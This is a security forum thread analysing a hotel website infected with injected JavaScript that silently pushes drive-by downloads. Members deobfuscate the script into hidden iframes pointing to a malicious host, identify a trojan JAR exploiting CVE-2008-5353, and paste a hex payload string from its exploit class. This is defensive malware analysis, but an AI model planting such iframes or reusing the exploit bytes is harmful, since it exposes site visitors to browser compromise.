Legal Website was infected by JS:ScriptDC-inf (Trj)

[Yanto.Chiang]

Dear All,

Just would like to share about this legal website which infected by script which automatically will pursue user to download malicious package.

http://safeweb.norton.com/report/show?url=http%3A%2F%2Fwww.tradershotel.net%2Ftraders-hotel-singapore%2F&x=0&y=0

http://www.unmaskparasites.com/security-report/?page=www.duowan.com/0910/119283364074.html

The link is : xxx.tradershotel.net/traders-hotel-singapore/

Note : Please don't try it at your home if you are not protection yet, because contains :

Drive-by Downloads
    A drive-by download is computer code that takes advantage of a software bug in a Web browser to make it do something that the attacker wants—such as run malicious code, crash the browser, or read data from the computer. Software bugs that are open to browser attacks are also known as vulnerabilities.

[Pondus]

do you have the download from that website? can you upload it to VirusTotal ?

[Yanto.Chiang]

Hi Pondus,

I am not able to download it, since i protected by avast IS 5.0 (trial license).

And is it possible for us to download it ?

Since this website infected and silently ask user to download the malicious.

[Yanto.Chiang]

Again i rescan with :

http://wepawet.iseclab.org/view.php?hash=12b326ffef27a2a7eb4505a071024a27&t=1265339613&type=js

Nothing suspicious found in this website.

[jsejtko]

Hello,

the problem is in server generated messages (404 in this case) -> please look at the attached image. There are injected scripts (more copies of identical one). Hidden iframe tag is located under the encryption - it points to known malicious website.

You will have to remove all the scripts (shown in the image) and check security of your server (passwords, vulnerabilities, etc).

Regards

[Yanto.Chiang]

Hello,

the problem is in server generated messages (404 in this case) -> please look at the attached image. There are injected scripts (more copies of identical one). Hidden iframe tag is located under the encryption - it points to known malicious website.

You will have to remove all the scripts (shown in the image) and check security of your server (passwords, vulnerabilities, etc).

Regards

Hi,

Thanks for your details information, i just would like to know what is the source of this problem.

[YoKenny]

Have a read here:
Every 3.6 seconds a website is infected
http://www.scmagazineus.com/every-36-seconds-a-website-is-infected/article/140414

The site owner of tradershotel.net will have to clean up their site and follow jsejtko's advice.

[polonus]

Hi folks,

For the infected webmaster, here is a server side code cleaner:
http://faiz.kera.la/2009/04/12/server-side-code-cleaner-in-aspnet-for-iframe-injection-attack/

and more in depth info:
http://weblogs.asp.net/scottgu/archive/2006/09/30/Tip_2F00_Trick_3A00_-Guard-Against-SQL-Injection-Attacks.aspxand more in depth:

polonus

[computerfreaker]

I just went to check out that page; here's what Microsoft Forefront Client Security had to say, almost immediately.

Virus: JS/Decdec.A. Risk level: Severe. Advice: Remove this program immediately.
Programs that may compromise your privacy or damage your computer were detected.

I let it run in a sandbox, then grabbed the malicious JS and de-obfuscated it. Here's the results:

Code: [Select]

<iframe src="hxxp://www.kotopes.cn/forum/image/index.php" width=1 height=1 frameborder=0></iframe>
<iframe src="hxxp://www.kotopes.cn/forum/image/index.php" width=1 height=1 frameborder=0></iframe>
<iframe src="hxxp://www.kotopes.cn/forum/image/index.php" width=1 height=1 frameborder=0></iframe>
<iframe src="hxxp://www.kotopes.cn/forum/image/index.php" width=1 height=1 frameborder=0></iframe>

hxxp://www.kotopes.cn/forum/image/index.php returned a 404 Not Found, but hxxp://www.kotopes.cn is still alive and well. It's possible, too, that the 404 Not Found is an evasive maneuver.

[polonus]

Hi computerfreaker,

Good work, here are the identical results from another scan:
General information
Location of website is in China

Analayzed kotopes dot cn for security problems.

Report of threats found
Total number of threats: 1

    Virus
Threat found: 1
Full list:
Name of threat:   Trojan Horse
Location:    htxp://www.kotopes.cn/forum/image/spl/sd.jar

pol

[computerfreaker]

Hi computerfreaker,

Good work, here are the identical results from another scan:
General information
Location of website is in China

Analayzed kotopes dot cn for security problems.

Report of threats found
Total number of threats: 1

    Virus
Threat found: 1
Full list:
Name of threat:   Trojan Horse
Location:    htxp://www.kotopes.cn/forum/image/spl/sd.jar

pol

You couldn't be more right on that JAR. I just loaded it; for some reason (maybe NoScript interfered with it?), it loaded as text. One thing caught my eye immediately: "payload". I'm going to download that and analyze it in a sandbox.

EDIT: wow, was that fast. I saved the JAR file, renamed it to a zip, and started extracting it; Microsoft Forefront Client Security immediately yelled about "Exploit:Java/CVE-2008-5353-B. Alert level: severe", "Trojan:Java/Selace.B" and "Trojan:Java/Selace.A".

WOW, is this blatant: the JAR contains three files, AppletX.class, LoaderX.class, and PayloadX.class. PayloadX.class triggered "Trojan:Java/Selace.B", AppletX.class triggered "Exploit:Java/CVE-2008-5353-B", and LoaderX.class triggered "Trojan:Java/Selace.A"

Let's see about decompiling these three bad boys and see what comes out.
hmm, Mocha doesn't like these for some reason. It's telling me they "aren't valid class files"; anybody know why, or what else I could use to decompile these?
Just from looking at them in a text editor, it looks like AppletX.class contains an overflow attack of some kind; right after a reference to Java's String object, I found this, followed by a StringToBytes call:

’ACED00057372001B6A6176612E7574696C2E477265676F7269616E43616C656E6461728F3DD7D6E5B0D0C10200014A0010677265676F7269616E4375746F766572787200126A6176612E7574696C2E43616C656E646172E6EA4D1EC8DC5B8E03000B5A000C6172654669656C647353657449000E66697273744461794F665765656B5A0009697354696D655365745A00076C656E69656E744900166D696E696D616C44617973496E46697273745765656B4900096E6578745374616D7049001573657269616C56657273696F6E4F6E53747265616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A4C00047A6F6E657400144C6A6176612F7574696C2F54696D655A6F6E653B78700100000001010100000001000000020000000100000121563AFC0E757200025B494DBA602676EAB2A502000078700000001100000001000007D9000000040000001500000004000000120000008A00000002000000030000000100000004000000100000001100000022000002DEFE488C0000000000757200025B5A578F203914B85DE20200007870000000110101010101010101010101010101010101737200186A6176612E7574696C2E53696D706C6554696D655A6F6E65FA675D60D15EF5A603001249000A647374536176696E6773490006656E6444617949000C656E644461794F665765656B490007656E644D6F6465490008656E644D6F6E7468490007656E6454696D6549000B656E6454696D654D6F64654900097261774F666673657449001573657269616C56657273696F6E4F6E53747265616D490008737461727444617949000E73746172744461794F665765656B49000973746172744D6F646549000A73746172744D6F6E7468490009737461727454696D6549000D737461727454696D654D6F64654900097374617274596561725A000B7573654461796C696768745B000B6D6F6E74684C656E6774687400025B42787200126A6176612E7574696C2E54696D655A6F6E6531B3E9F57744ACA10200014C000249447400124C6A6176612F6C616E672F537472696E673B787074000E416D65726963612F446177736F6E0036EE80000000000000000000000000000000000000000000000000FE488C00000000020000000000000000000000000000000000000000000000000000000000757200025B42ACF317F8060854E002000078700000000C1F1C1F1E1F1E1F1F1E1F1E1F770A000000060000000000007571007E0006000000020000000000000000787372000D6D79662E792E4C6F61646572585E8B4C67DDC409D8020000787078FFFFF4E2F964AC000A

I would like more info, though (especially on PayloadX.class and LoaderX.class), and decompiling is the way to go here IMHO.

Cheers!

computerfreaker

[Yanto.Chiang]

Nice information for your guys...

Cheers,